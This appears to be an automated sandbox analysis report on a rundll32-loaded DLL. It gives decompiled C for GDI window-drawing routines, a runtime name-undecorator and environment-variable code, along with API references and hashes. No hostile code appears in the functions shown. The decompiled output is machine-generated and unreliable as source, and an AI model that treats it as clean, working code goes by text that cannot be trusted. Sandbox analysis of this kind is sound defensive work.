CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100018AF
CreateSolidBrush.GDI32(000000FF), ref: 100018BD
MapWindowPoints.USER32 ref: 100018E4
OffsetRgn.GDI32(?,?,?), ref: 100018FA
FrameRgn.GDI32(?,?,00000000,00000003,00000003), ref: 1000190F
DeleteObject.GDI32(?), ref: 1000191E
DeleteObject.GDI32(?), ref: 10001923
GetDC.USER32(?), ref: 10001926
SaveDC.GDI32(00000000), ref: 10001938
SelectClipRgn.GDI32(00000000,?), ref: 10001948
SetMetaRgn.GDI32(00000000), ref: 1000194F
CreatePen.GDI32(00000000,00000001,00800080), ref: 1000195E
SelectObject.GDI32(00000000,00000000), ref: 10001969
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 1000197F
LineTo.GDI32(00000000,?,?), ref: 1000198A
RestoreDC.GDI32(00000000,?), ref: 100019A2
DeleteObject.GDI32(?), ref: 100019AB
DeleteObject.GDI32(?), ref: 100019B3
SelectClipRgn.GDI32(00000000,?), ref: 100019C9
CreatePen.GDI32(00000000,00000001,00FF0000), ref: 100019D8
SelectObject.GDI32(00000000,00000000), ref: 100019E6
MoveToEx.GDI32(00000000,?,00000000,00000000), ref: 10001A00
LineTo.GDI32(00000000,?,?), ref: 10001A0B
SelectObject.GDI32(00000000,00000000), ref: 10001A21
DeleteObject.GDI32(?), ref: 10001A33
SelectClipRgn.GDI32(00000000,00000000), ref: 10001A38
DeleteObject.GDI32(?), ref: 10001A44
ReleaseDC.USER32(?,00000000), ref: 10001A4E
EndPaint.USER32(?,?), ref: 10001A5E
ReleaseDC.USER32(?,?), ref: 10001A6A

Strings

333333?bad allocation, xrefs: 100017D7

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Object$CreateSelect$Delete$ClipMenuRect$IndirectState$BrushEllipticLineMetaMoveOffsetPaintPointsReleaseRestoreSaveSolidWindow$BeginClientCombineFillFrameMessageSendValidate
String ID: 333333?bad allocation
API String ID: 1726318560-423781954
Opcode ID: 682ad894c4e66abcb482285e08704e5de5c6abde572e8e8bafc112f18911f1dd
Instruction ID: ec48b5f3750a01a1299650892f8a478bee22796d16189536311e5406ba00b7dd
Opcode Fuzzy Hash: 682ad894c4e66abcb482285e08704e5de5c6abde572e8e8bafc112f18911f1dd
Instruction Fuzzy Hash: 1CC13C71A00228EFEB229FA0CE88B9EBBB9FF4A341F504055F605F6161DB755A41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 100014BD, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E100014BD(struct HWND__* _a4, int _a12, int _a16) {
				struct HDC__* _v8;
				int _v12;
				int _v16;
				intOrPtr _t32;
				struct HDC__* _t37;
				intOrPtr* _t40;
				intOrPtr _t41;
				void* _t47;
				intOrPtr _t53;
				void* _t55;
				int _t58;
				intOrPtr* _t59;
				int _t63;
				intOrPtr* _t64;
				struct HDC__* _t65;

				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0 &&  *0x1004dc34 != 0) {
					_t53 =  *0x1004dc38; // 0x313ce8
					_t4 = _t53 + 4; // 0x313ce8
					_t32 =  *_t4;
					_t5 = _t32 + 8; // 0x0
					_t6 = _t32 + 0xc; // 0x0
					_v16 = _a12;
					_v12 = _a16;
					_push( &_v16);
					E10001102(_t55, _t53);
					_t37 = GetDC(_a4);
					_v8 = _t37;
					MoveToEx(_t37,  *_t5,  *_t6, 0);
					LineTo(_v8, _v16, _v12);
					_t40 =  *0x1004dc38; // 0x313ce8
					_t41 =  *_t40;
					_t63 =  *(_t41 + 0xc);
					_t58 =  *(_t41 + 8);
					LineTo(_v8, _t58, _t63);
					BeginPath(_v8);
					MoveToEx(_v8, _t58, _t63, 0);
					_t59 =  *0x1004dc38; // 0x313ce8
					_t64 =  *_t59;
					if(_t64 != _t59) {
						while(1) {
							_t64 =  *_t64;
							if(_t64 == _t59) {
								goto L6;
							}
							LineTo(_v8,  *(_t64 + 8),  *(_t64 + 0xc));
						}
					}
					L6:
					_t65 = _v8;
					CloseFigure(_t65);
					EndPath(_t65);
					_t47 =  *0x1004dbcc; // 0x0
					if(_t47 != 0) {
						DeleteObject(_t47);
						 *0x1004dbcc =  *0x1004dbcc & 0x00000000;
					}
					 *0x1004dbcc = PathToRegion(_t65);
					ReleaseDC(_a4, _t65);
					RedrawWindow(_a4, 0, 0, 0x105);
					 *0x1004dc34 = 0;
				}
				return 0;
			}

APIs

GetMenu.USER32 ref: 100014C6
GetSubMenu.USER32 ref: 100014CF
GetMenuState.USER32(00000000,000000CB,00000000), ref: 100014DD

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

GetDC.USER32(?), ref: 10001527
MoveToEx.GDI32(00000000,00000000,00000000,00000000), ref: 10001535
LineTo.GDI32(?,?,?), ref: 10001544
LineTo.GDI32(?,?,?), ref: 1000155C
BeginPath.GDI32(?), ref: 10001565
MoveToEx.GDI32(?,?,?,00000000), ref: 10001572
LineTo.GDI32(?,?,?), ref: 1000158F
CloseFigure.GDI32(?), ref: 1000159F
EndPath.GDI32(?), ref: 100015A6
DeleteObject.GDI32(00000000), ref: 100015B6
PathToRegion.GDI32(?), ref: 100015C4
ReleaseDC.USER32(?,?), ref: 100015D3
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 100015E5

Strings

<1, xrefs: 100014F8, 1000151A, 1000154A, 10001578

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: LineMenuPath$Move$BeginCloseDeallocateDeleteFigureObjectRedrawRegionReleaseStateWindow
String ID: <1
API String ID: 3279537990-3323784537
Opcode ID: 22e4b22e0efdb5f74bec913847a42e61d660f659a6178cf68644454104272bd8
Instruction ID: 236d3021e18466ba726e930eba69d07649331866de6a3b4fa2b3998426ac5257
Opcode Fuzzy Hash: 22e4b22e0efdb5f74bec913847a42e61d660f659a6178cf68644454104272bd8
Instruction Fuzzy Hash: 8F310735A01224EFEB11AFA4CE88B8A7BB5FF4A351F518055FA05E7271C770A940DB98

Uniqueness

Uniqueness Score: -1.00%

Function 1000A54C, Relevance: 28.8, APIs: 19, Instructions: 339
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E1000A54C(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				char _v52;
				void* __ebx;
				void* _t105;
				signed int* _t107;
				signed int _t110;
				unsigned int _t111;
				void* _t115;
				void* _t129;
				unsigned int _t134;
				void* _t142;
				void* _t148;
				intOrPtr* _t149;
				intOrPtr* _t152;
				unsigned int _t154;
				signed char _t156;
				void* _t162;
				intOrPtr* _t163;
				signed int _t165;
				signed int _t169;
				void* _t172;
				signed int* _t174;
				signed int _t181;
				signed int _t185;
				void* _t189;
				intOrPtr* _t190;
				void* _t191;
				signed int _t195;
				unsigned int _t205;
				void* _t235;
				signed int _t253;
				signed int _t257;
				intOrPtr* _t260;
				intOrPtr* _t261;
				void* _t262;
				void* _t263;

				_t198 =  *0x1004e004; // 0x0
				_t263 = _t262 - 0x30;
				_t105 =  *_t198;
				if(_t105 == 0) {
					L50:
					E10007662(_t198, _a4, 1, _a8);
					L51:
					_t107 = _a4;
					L52:
					return _t107;
				}
				if(_t105 < 0x36 || _t105 > 0x39) {
					if(_t105 != 0x5f) {
						goto L49;
					}
					goto L4;
				} else {
					L4:
					_t195 = _t105 - 0x36;
					_t198 = _t198 + 1;
					 *0x1004e004 = _t198;
					if(_t195 != 0x29) {
						__eflags = _t195;
						if(_t195 < 0) {
							L49:
							_t107 = _a4;
							_t107[1] = _t107[1] & 0x00000000;
							 *_t107 =  *_t107 & 0x00000000;
							_t107[1] = 2;
							goto L52;
						}
						_t253 = _t198;
						__eflags = _t195 - 3;
						if(__eflags > 0) {
							goto L49;
						}
						L11:
						if(_t195 == 0xffffffff) {
							goto L49;
						}
						_t260 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t260;
						_v8 =  *((intOrPtr*)(_t260 + 4));
						_t110 = 2;
						_t257 = _t195 & _t110;
						if(_t257 == 0) {
							L23:
							if((_t195 & 0x00000004) != 0) {
								_t154 =  *0x1004e00c; // 0x0
								_t156 =  !(_t154 >> 1);
								_t282 = _t156 & 0x00000001;
								_push( &_v52);
								if((_t156 & 0x00000001) == 0) {
									E1000792E( &_v12, E10008C87(_t253, __eflags));
								} else {
									_t162 = E10007637(_t198,  &_v44, 0x20, E10008C87(_t253, _t282));
									_t263 = _t263 + 0x10;
									_t163 = E100076A6(_t162,  &_v28,  &_v12);
									_v12 =  *_t163;
									_v8 =  *((intOrPtr*)(_t163 + 4));
								}
							}
							_t111 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if(( !(_t111 >> 1) & 0x00000001) == 0) {
								_t115 = E10009326();
								_t200 =  &_v12;
								E1000792E( &_v12, _t115);
							} else {
								_t152 = E100076A6(E10009326(),  &_v44,  &_v12);
								_t200 =  *_t152;
								_v12 =  *_t152;
								_v8 =  *((intOrPtr*)(_t152 + 4));
							}
							if( *_t260 != 0) {
								_t148 = E10007637(_t200,  &_v52, 0x28,  &_v12);
								_t263 = _t263 + 0xc;
								_t149 = E100076C8(_t148,  &_v44, 0x29);
								_v12 =  *_t149;
								_v8 =  *((intOrPtr*)(_t149 + 4));
							}
							_t261 = E1000A9CF(0x1004e020, 8);
							if(_t261 == 0) {
								_t261 = 0;
							} else {
								 *_t261 = 0;
								 *((intOrPtr*)(_t261 + 4)) = 0;
							}
							E1000B7CC(0,  &_v36, _t261);
							E100077A0( &_v12, E100076C8(E10007637(0x1004e020,  &_v44, 0x28, E1000892F( &_v52)),  &_v28, 0x29));
							_t205 =  *0x1004e00c; // 0x0
							if((_t205 & 0x00000060) != 0x60 && _t257 != 0) {
								E100077A0( &_v12,  &_v20);
								_t205 =  *0x1004e00c; // 0x0
							}
							_push( &_v52);
							if(( !(_t205 >> 0x13) & 0x00000001) == 0) {
								_t129 = E1000B6A3(_t253);
								_t209 =  &_v12;
								E1000792E( &_v12, _t129);
							} else {
								_t142 = E1000B6A3(_t253);
								_t209 =  &_v12;
								E100077A0( &_v12, _t142);
							}
							E100077A0( &_v12, E1000AA59(_t209,  &_v52));
							_t134 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if(( !(_t134 >> 8) & 0x00000001) == 0) {
								E1000792E( &_v12, E1000C728());
							} else {
								E100077A0( &_v12, E1000C728());
							}
							_t107 = _a4;
							if(_t261 == 0) {
								_t107[1] = 0;
								_t107[1] = 3;
								 *_t107 = 0;
							} else {
								 *_t261 = _v12;
								 *((intOrPtr*)(_t261 + 4)) = _v8;
								 *_t107 = _v36;
								_t107[1] = _v32;
							}
							goto L52;
						}
						if( *_t198 == 0x40) {
							_t33 = _t253 + 1; // 0x2
							_t165 = _t33;
							 *0x1004e004 = _t165;
							L19:
							_t235 =  *_t165;
							if(_t235 == 0) {
								E100076A6(E100072DE( &_v52, 1), _a4,  &_v12);
								goto L51;
							}
							if(_t235 != 0x40) {
								goto L49;
							}
							 *0x1004e004 = _t165 + 1;
							_t169 =  *0x1004e00c; // 0x0
							_push( &_v52);
							if((_t169 & 0x00000060) == 0x60) {
								_t172 = E1000C6F9();
								_t198 =  &_v20;
								E1000792E( &_v20, _t172);
							} else {
								_t174 = E1000C6F9();
								_t198 =  *_t174;
								_v20 =  *_t174;
								_v16 = _t174[1];
							}
							goto L23;
						}
						_v24 = _t110;
						_v28 = "::";
						_t244 = E1000723E( &_v44,  &_v28);
						E100076A6(_t177,  &_v28,  &_v12);
						_v12 = _v28;
						_v8 = _v24;
						_t181 =  *0x1004e004; // 0x0
						if( *_t181 == 0) {
							E100076A6(E100072DE( &_v52, 1),  &_v28,  &_v12);
							_v12 = _v28;
							_t185 = _v24;
						} else {
							_t189 = E10007637(_t244,  &_v28, 0x20, E1000B7FB(_t253,  &_v44));
							_t263 = _t263 + 0x10;
							_t190 = E100076A6(_t189,  &_v52,  &_v12);
							_t185 =  *(_t190 + 4);
							_v12 =  *_t190;
						}
						_v8 = _t185;
						_t165 =  *0x1004e004; // 0x0
						goto L19;
					}
					_t191 =  *_t198;
					if(_t191 == 0) {
						goto L50;
					} else {
						_t1 = _t198 + 1; // 0x2
						_t253 = _t1;
						_t195 = _t191 - 0x3d;
						_t198 = _t253;
						 *0x1004e004 = _t198;
						if(_t195 < 4 || _t195 > 7) {
							_t195 = _t195 | 0xffffffff;
						}
						goto L11;
					}
				}
			}

APIs

DName::operator+.LIBCMT ref: 1000A619
DName::operator+.LIBCMT ref: 1000A656
DName::DName.LIBVCRUNTIME ref: 1000A66A
DName::operator+.LIBCMT ref: 1000A679
DName::operator+.LIBCMT ref: 1000A707
DName::operator|=.LIBCMT ref: 1000A723
DName::DName.LIBVCRUNTIME ref: 1000A72F
DName::operator+.LIBCMT ref: 1000A73D
DName::operator+.LIBCMT ref: 1000A777
DName::operator+.LIBCMT ref: 1000A7B8
UnDecorator::getReturnType.LIBCMT ref: 1000A7E8
operator+.LIBVCRUNTIME ref: 1000A8F5

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID:
API String ID: 1186856153-0
Opcode ID: 9a4858990016edd865b9f5722faa12f8155521a7dd883606db600d808f10d677
Instruction ID: baac971f02029b1684e9aa9550a20a3cdcf8536d5ea312e8ad83acfebace1a35
Opcode Fuzzy Hash: 9a4858990016edd865b9f5722faa12f8155521a7dd883606db600d808f10d677
Instruction Fuzzy Hash: B7C1C175D04208AFEB04CFA4C895EEE7BF8FF09380F104159E50AA7285EF35AA85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10028E03, Relevance: 24.4, APIs: 16, Instructions: 411
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10028E03(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v0;
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v48;
				signed int _v100;
				signed int _v136;
				signed int _t116;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed int _t129;
				signed int _t133;
				signed int _t135;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				void* _t147;
				signed int _t152;
				signed int* _t154;
				signed int* _t160;
				signed int _t166;
				signed int _t169;
				void* _t170;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t182;
				intOrPtr* _t191;
				signed int _t196;
				signed int _t203;
				intOrPtr* _t210;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t237;
				signed int _t238;
				void* _t239;
				void* _t241;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				signed int _t267;
				signed int _t270;
				signed int _t272;
				signed int _t274;
				signed int _t281;
				signed int _t282;
				void* _t283;
				signed int _t284;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				WCHAR* _t302;
				signed int _t303;
				signed int _t304;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;
				void* _t324;

				_t222 = __ebx;
				_t308 = _t316;
				_t317 = _t316 - 0x10;
				_t295 = _a4;
				_t326 = _t295;
				if(_t295 != 0) {
					_push(__ebx);
					_t286 = _t295;
					_t116 = E10041B10(_t295, 0x3d);
					_v20 = _t116;
					__eflags = _t116;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t116 - _t295;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t116 + 1));
							L120();
							_t222 = 0;
							__eflags =  *0x1004e384 - _t222; // 0x31b4f0
							if(__eflags != 0) {
								L14:
								_t121 =  *0x1004e384; // 0x31b4f0
								_v12 = _t121;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L39;
								} else {
									_t124 = E10029436(_t295, _v20 - _t295);
									_v16 = _t124;
									_t237 = _v12;
									__eflags = _t124;
									if(_t124 < 0) {
										L24:
										__eflags = _v5 - _t222;
										if(_v5 == _t222) {
											goto L40;
										} else {
											_t125 =  ~_t124;
											_v16 = _t125;
											_t30 = _t125 + 2; // 0x2
											_t282 = _t30;
											__eflags = _t282 - _t125;
											if(_t282 < _t125) {
												goto L39;
											} else {
												__eflags = _t282 - 0x3fffffff;
												if(_t282 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E10029699(_t237, _t282, 4);
													E100268B3(_t222);
													_t128 = _v12;
													_t317 = _t317 + 0x10;
													__eflags = _t128;
													if(_t128 == 0) {
														goto L39;
													} else {
														_t238 = _v16;
														_t286 = _t222;
														 *(_t128 + _t238 * 4) = _t295;
														 *(_t128 + 4 + _t238 * 4) = _t222;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t237 - _t222;
										if( *_t237 == _t222) {
											goto L24;
										} else {
											E100268B3( *((intOrPtr*)(_t237 + _t124 * 4)));
											_t281 = _v16;
											__eflags = _v5 - _t222;
											if(_v5 != _t222) {
												_t286 = _t222;
												 *(_v12 + _t281 * 4) = _t295;
											} else {
												_t282 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t282 + _t281 * 4)) - _t222;
													if( *((intOrPtr*)(_t282 + _t281 * 4)) == _t222) {
														break;
													}
													 *((intOrPtr*)(_t282 + _t281 * 4)) =  *((intOrPtr*)(_t282 + 4 + _t281 * 4));
													_t281 = _t281 + 1;
													__eflags = _t281;
												}
												_v16 = E10029699(_t282, _t281, 4);
												E100268B3(_t222);
												_t128 = _v16;
												_t317 = _t317 + 0x10;
												__eflags = _t128;
												if(_t128 != 0) {
													L29:
													 *0x1004e384 = _t128;
												}
											}
											__eflags = _a8 - _t222;
											if(_a8 == _t222) {
												goto L40;
											} else {
												_t239 = _t295 + 1;
												do {
													_t129 =  *_t295;
													_t295 = _t295 + 1;
													__eflags = _t129;
												} while (_t129 != 0);
												_v16 = _t295 - _t239 + 2;
												_t298 = E10026850(_t295 - _t239 + 2, 1);
												_pop(_t241);
												__eflags = _t298;
												if(_t298 == 0) {
													L37:
													E100268B3(_t298);
													goto L40;
												} else {
													_t133 = E100120A5(_t298, _v16, _a4);
													_t319 = _t317 + 0xc;
													__eflags = _t133;
													if(__eflags != 0) {
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														_push(_t222);
														E1000E341();
														asm("int3");
														_push(_t308);
														_t310 = _t319;
														_t320 = _t319 - 0x10;
														_push(_t222);
														_t225 = _v48;
														__eflags = _t225;
														if(__eflags != 0) {
															_push(_t298);
															_push(_t286);
															_push(0x3d);
															_push(_t225);
															_t288 = _t225;
															_t135 = E10041C3B(_t241);
															_v20 = _t135;
															__eflags = _t135;
															if(__eflags == 0) {
																L81:
																 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
																goto L82;
															} else {
																__eflags = _t135 - _t225;
																if(__eflags == 0) {
																	goto L81;
																} else {
																	_t139 =  *(_t135 + 2) & 0x0000ffff;
																	_v24 = _t139;
																	_v16 = _t139;
																	E1002941C();
																	_t300 =  *0x1004e388; // 0x0
																	_t226 = 0;
																	__eflags = _t300;
																	if(_t300 != 0) {
																		L59:
																		_v20 = _v20 - _t288 >> 1;
																		_t142 = E1002948B(_t288, _v20 - _t288 >> 1);
																		_v12 = _t142;
																		__eflags = _t142;
																		if(_t142 < 0) {
																			L67:
																			__eflags = _v16 - _t226;
																			if(_v16 == _t226) {
																				goto L83;
																			} else {
																				_t143 =  ~_t142;
																				_v12 = _t143;
																				_t75 = _t143 + 2; // 0x2
																				_t252 = _t75;
																				__eflags = _t252 - _t143;
																				if(_t252 < _t143) {
																					goto L82;
																				} else {
																					__eflags = _t252 - 0x3fffffff;
																					if(_t252 >= 0x3fffffff) {
																						goto L82;
																					} else {
																						_t301 = E10029699(_t300, _t252, 4);
																						E100268B3(_t226);
																						_t320 = _t320 + 0x10;
																						__eflags = _t301;
																						if(_t301 == 0) {
																							goto L82;
																						} else {
																							_t253 = _v12;
																							_t288 = _t226;
																							_t146 = _v0;
																							 *(_t301 + _t253 * 4) = _t146;
																							 *(_t301 + 4 + _t253 * 4) = _t226;
																							goto L72;
																						}
																					}
																				}
																			}
																		} else {
																			__eflags =  *_t300 - _t226;
																			if( *_t300 == _t226) {
																				goto L67;
																			} else {
																				E100268B3( *((intOrPtr*)(_t300 + _t142 * 4)));
																				_t274 = _v12;
																				__eflags = _v16 - _t226;
																				if(_v16 == _t226) {
																					while(1) {
																						__eflags =  *(_t300 + _t274 * 4) - _t226;
																						if( *(_t300 + _t274 * 4) == _t226) {
																							break;
																						}
																						 *(_t300 + _t274 * 4) =  *(_t300 + 4 + _t274 * 4);
																						_t274 = _t274 + 1;
																						__eflags = _t274;
																					}
																					_t301 = E10029699(_t300, _t274, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0x10;
																					_t146 = _t288;
																					__eflags = _t301;
																					if(_t301 != 0) {
																						L72:
																						 *0x1004e388 = _t301;
																					}
																				} else {
																					_t146 = _v0;
																					_t288 = _t226;
																					 *(_t300 + _t274 * 4) = _t146;
																				}
																				__eflags = _a4 - _t226;
																				if(_a4 == _t226) {
																					goto L83;
																				} else {
																					_t254 = _t146;
																					_t84 = _t254 + 2; // 0x2
																					_t283 = _t84;
																					do {
																						_t147 =  *_t254;
																						_t254 = _t254 + 2;
																						__eflags = _t147 - _t226;
																					} while (_t147 != _t226);
																					_t85 = (_t254 - _t283 >> 1) + 2; // 0x0
																					_v16 = _t85;
																					_t302 = E10026850(_t85, 2);
																					_pop(_t258);
																					__eflags = _t302;
																					if(_t302 == 0) {
																						L80:
																						E100268B3(_t302);
																						goto L83;
																					} else {
																						_t152 = E10028A30(_t302, _v16, _v0);
																						_t322 = _t320 + 0xc;
																						__eflags = _t152;
																						if(_t152 != 0) {
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							_push(_t226);
																							E1000E341();
																							asm("int3");
																							_push(_t310);
																							_t312 = _t322;
																							_push(_t288);
																							_t290 = _v100;
																							__eflags = _t290;
																							if(_t290 != 0) {
																								_t260 = 0;
																								_t154 = _t290;
																								__eflags =  *_t290;
																								if( *_t290 != 0) {
																									do {
																										_t154 =  &(_t154[1]);
																										_t260 = _t260 + 1;
																										__eflags =  *_t154;
																									} while ( *_t154 != 0);
																								}
																								_t96 = _t260 + 1; // 0x2
																								_t303 = E10026850(_t96, 4);
																								_t262 = _t302;
																								__eflags = _t303;
																								if(_t303 == 0) {
																									L101:
																									E10012120(_t226, _t262, _t283, _t303);
																									goto L102;
																								} else {
																									_t270 =  *_t290;
																									__eflags = _t270;
																									if(_t270 == 0) {
																										L100:
																										E100268B3(0);
																										_t177 = _t303;
																										goto L88;
																									} else {
																										_push(_t226);
																										_t226 = _t303 - _t290;
																										__eflags = _t226;
																										do {
																											_t97 = _t270 + 1; // 0x5
																											_t283 = _t97;
																											do {
																												_t178 =  *_t270;
																												_t270 = _t270 + 1;
																												__eflags = _t178;
																											} while (_t178 != 0);
																											_t262 = _t270 - _t283;
																											_t98 = _t262 + 1; // 0x6
																											_v16 = _t98;
																											 *(_t226 + _t290) = E10026850(_t98, 1);
																											E100268B3(0);
																											_t322 = _t322 + 0xc;
																											__eflags =  *(_t226 + _t290);
																											if( *(_t226 + _t290) == 0) {
																												goto L101;
																											} else {
																												_t182 = E100120A5( *(_t226 + _t290), _v16,  *_t290);
																												_t322 = _t322 + 0xc;
																												__eflags = _t182;
																												if(_t182 != 0) {
																													L102:
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													_push(0);
																													E1000E341();
																													asm("int3");
																													_push(_t312);
																													_push(_t262);
																													_push(_t262);
																													_push(_t290);
																													_t291 = _v136;
																													__eflags = _t291;
																													if(_t291 != 0) {
																														_t284 = 0;
																														_t160 = _t291;
																														_t263 = 0;
																														_v20 = 0;
																														__eflags =  *_t291;
																														if( *_t291 != 0) {
																															do {
																																_t160 =  &(_t160[1]);
																																_t263 = _t263 + 1;
																																__eflags =  *_t160;
																															} while ( *_t160 != 0);
																														}
																														_t107 = _t263 + 1; // 0x2
																														_t304 = E10026850(_t107, 4);
																														_t265 = _t303;
																														__eflags = _t304;
																														if(_t304 == 0) {
																															L118:
																															E10012120(_t226, _t265, _t284, _t304);
																															goto L119;
																														} else {
																															_t267 =  *_t291;
																															__eflags = _t267;
																															if(_t267 == 0) {
																																L117:
																																E100268B3(0);
																																_t169 = _t304;
																																goto L105;
																															} else {
																																_push(_t226);
																																_t226 = _t304 - _t291;
																																__eflags = _t226;
																																do {
																																	_t108 = _t267 + 2; // 0x6
																																	_t284 = _t108;
																																	do {
																																		_t170 =  *_t267;
																																		_t267 = _t267 + 2;
																																		__eflags = _t170 - _v20;
																																	} while (_t170 != _v20);
																																	_t110 = (_t267 - _t284 >> 1) + 1; // 0x3
																																	_v24 = _t110;
																																	 *(_t226 + _t291) = E10026850(_t110, 2);
																																	E100268B3(0);
																																	_t324 = _t322 + 0xc;
																																	__eflags =  *(_t226 + _t291);
																																	if( *(_t226 + _t291) == 0) {
																																		goto L118;
																																	} else {
																																		_t175 = E10028A30( *(_t226 + _t291), _v24,  *_t291);
																																		_t322 = _t324 + 0xc;
																																		__eflags = _t175;
																																		if(_t175 != 0) {
																																			L119:
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			_push(0);
																																			E1000E341();
																																			asm("int3");
																																			_t166 =  *0x1004e384; // 0x31b4f0
																																			__eflags = _t166 -  *0x1004e390; // 0x31b4f0
																																			if(__eflags == 0) {
																																				_push(_t166);
																																				L86();
																																				 *0x1004e384 = _t166;
																																				return _t166;
																																			}
																																			return _t166;
																																		} else {
																																			goto L115;
																																		}
																																	}
																																	goto L123;
																																	L115:
																																	_t291 = _t291 + 4;
																																	_t267 =  *_t291;
																																	__eflags = _t267;
																																} while (_t267 != 0);
																																goto L117;
																															}
																														}
																													} else {
																														_t169 = 0;
																														__eflags = 0;
																														L105:
																														return _t169;
																													}
																												} else {
																													goto L98;
																												}
																											}
																											goto L123;
																											L98:
																											_t290 = _t290 + 4;
																											_t270 =  *_t290;
																											__eflags = _t270;
																										} while (_t270 != 0);
																										goto L100;
																									}
																								}
																							} else {
																								_t177 = 0;
																								__eflags = 0;
																								L88:
																								return _t177;
																							}
																						} else {
																							_t272 =  &(_t302[_v20 + 1]);
																							 *((short*)(_t272 - 2)) = 0;
																							asm("sbb eax, eax");
																							__eflags = SetEnvironmentVariableW(_t302,  ~(_v24 & 0x0000ffff) & _t272);
																							if(__eflags == 0) {
																								_t191 = E1002449E(__eflags);
																								_t226 = _t226 | 0xffffffff;
																								__eflags = _t226;
																								 *_t191 = 0x2a;
																							}
																							goto L80;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t196 =  *0x1004e384; // 0x31b4f0
																		__eflags = _a4;
																		if(_a4 == 0) {
																			L52:
																			__eflags = _v16 - _t226;
																			if(_v16 != _t226) {
																				__eflags = _t196;
																				if(_t196 != 0) {
																					L57:
																					 *0x1004e388 = E10026850(1, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0xc;
																					goto L58;
																				} else {
																					 *0x1004e384 = E10026850(1, 4);
																					E100268B3(_t226);
																					_t320 = _t320 + 0xc;
																					__eflags =  *0x1004e384 - _t226; // 0x31b4f0
																					if(__eflags == 0) {
																						goto L82;
																					} else {
																						_t300 =  *0x1004e388; // 0x0
																						__eflags = _t300;
																						if(_t300 != 0) {
																							goto L59;
																						} else {
																							goto L57;
																						}
																					}
																				}
																			} else {
																				_t226 = 0;
																				goto L83;
																			}
																		} else {
																			__eflags = _t196;
																			if(_t196 == 0) {
																				goto L52;
																			} else {
																				__eflags = L10011782();
																				if(__eflags == 0) {
																					goto L81;
																				} else {
																					E1002941C();
